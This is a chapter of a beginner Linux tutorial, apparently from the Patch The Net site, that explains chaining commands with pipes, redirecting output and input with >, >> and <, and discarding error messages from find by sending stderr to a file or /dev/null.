Now let’s apply what we’ve learned in this section. I will add a pipe operator followed by the head command (if you recall from our previous chapters, the head command outputs only the first 10 lines of its input):

$ ls -l | head

Well now, we get a different result. As you can see in the image below, only the first 10 lines are displayed on the terminal.

So what happened here is that the command on the left of the pipe (ls -l) sent its output to the command on the right (head) instead of displaying it directly on the screen. The head command then treated this output like any other input and displayed only its first 10 lines.

Command Chaining

We can take this even one step further and use a series of pipes to chain multiple commands.

Building on our previous example, let’s say that I want to run a command that outputs only the line corresponding to file03.

We know how to display the first n lines using the head command.

$ ls -l | head -n 5

So, if we run the above command, we should get the following result.

Now if we add another pipe, piping this result into the tail command, then we can select the last line using the ‘-n’ flag.

$ ls -l | head -n 5 | tail -n 1

And this, right here, is where all the magic of Linux lies.

Note that we could have done this using grep, which is another powerful Linux command. However, since it wasn’t yet covered in this tutorial, it would be better to ignore it for the time being. But don’t worry, we’ll cover it soon enough in a future chapter.
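If you’d like to reproduce this result exactly on your own machine, you can build a small sandbox first. Note that the sketch below uses plain “ls” rather than “ls -l”, so there is no extra “total” header line to account for (the directory and file names are just placeholders matching the example):

```shell
# Create a scratch directory containing five empty files
mkdir -p sandbox
touch sandbox/file01 sandbox/file02 sandbox/file03 sandbox/file04 sandbox/file05

# List the files, keep the first 3 lines, then keep the last one of those
ls sandbox | head -n 3 | tail -n 1
# -> file03
```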

Redirection

Writing output to a file

So far, whenever we execute a command, we see its output on the screen. This means that its stdout is connected to the terminal. However, this doesn’t always have to be the case.

We can redirect this output to a file by using the right-pointing arrow symbol (>), followed by the location of the file where we want to write the output.

Here is an example.

$ ls -l > output.txt

Although running the above command won’t display anything on the screen, this doesn’t mean that nothing happened. In fact, ls -l was executed, and then its output was stored in the file “output.txt”.

If you read the content of “output.txt”, you can see the output of our command.

Note that if the file “output.txt” exists already, then redirecting to it will overwrite its previous content. If you want to keep its previous content and store your output at the end of the file, then you should use two arrows instead of one.

$ ls -l >> output.txt
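To see the difference between the two operators, try the following (echo simply prints its argument to stdout; the file name here is just an example):

```shell
# '>' truncates the file every time it is used
echo "first attempt" > notes.txt
echo "overwritten" > notes.txt
cat notes.txt
# -> overwritten

# '>>' appends to the end instead
echo "appended line" >> notes.txt
cat notes.txt
# -> overwritten
#    appended line
```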

Reading from a file

You can read from a file and redirect its content to the input of a command using an arrow symbol pointing to the left (<), followed by the path to the file.

To illustrate this, I created a file called input.txt with the following content.

123
420
857
432
122

Now, we will use the sort command to, obviously, sort these numbers, reading them directly from the file.

We will cover “sort” in more detail in a future chapter. I brought it up here only as an example of how a command can take its input from a file.
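The command described above can be written like this (recreating input.txt first so the snippet is self-contained):

```shell
# Recreate input.txt
printf '123\n420\n857\n432\n122\n' > input.txt

# Feed the file's content to sort's standard input
sort < input.txt
# -> 122
#    123
#    420
#    432
#    857
```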

Redirecting Errors

Before we close this chapter, we need to address the last of the three data streams that I introduced in the first section of this chapter.

If you remember, we said that programs have a separate stream where they send their errors. This means that we can process errors separately from the standard output.

This can be useful for certain commands that raise a lot of errors.

For example, if you remember from the last chapter, the “find” command can be used to search for a file in a specified path. However, this command can sometimes display a lot of errors when it tries to search in a directory that it cannot access due to a lack of permissions.

In the image below, I tried to search for the file ‘patchthenet’.

As you can see, the “find” command’s output is dominated by error messages. So, even if it did find the file that I was looking for, I wouldn’t be able to spot it among the sea of errors thrown at me.

So, one way to solve this problem is to send the stderr stream to a file so that it does not appear on the screen:

$ find / -name 'patchthenet' 2> errors.txt

The value 2 refers to the stderr stream. Here, I am sending all the errors to a file called errors.txt, which leaves the terminal clean to display the desired output.

The only problem here, however, is that I ended up with the file ‘errors.txt’ which I would now have to remove.

/dev/null

Thankfully, I don’t have to create a new file just to discard my errors. Linux has a solution for this: a special file, located at /dev/null, where you can send any output that you don’t need. Everything you send there vanishes. Think of it like a black hole: anything that goes in gets destroyed.
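Here is a tiny, self-contained way to see /dev/null in action (the path below is deliberately made up so that the command is guaranteed to produce an error):

```shell
# Without the redirect, ls would print "No such file or directory" on stderr.
# With '2> /dev/null', the error simply vanishes.
ls /this/path/does/not/exist 2> /dev/null || true  # '|| true' just keeps the script's exit status clean

echo "No error message in sight"
# -> No error message in sight
```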

Now, the final command should look like this (searching, for example, from the root directory):

$ find / -name 'patchthenet' 2> /dev/null

And that’s it. Problem solved.


This wraps up the piping and redirection chapter. I recommend that you take some time to become comfortable with what we have covered so far. Once you feel ready, I’ll meet you in the next chapter where we start discussing how to extract and process data in Linux.

The post Chapter 7 – Piping and Redirection appeared first on Patch The Net.

]]>
https://patchthenet.com/tutorials/linux/embracing-the-power-of-linux/chapter-7-piping-and-redirection/feed/ 0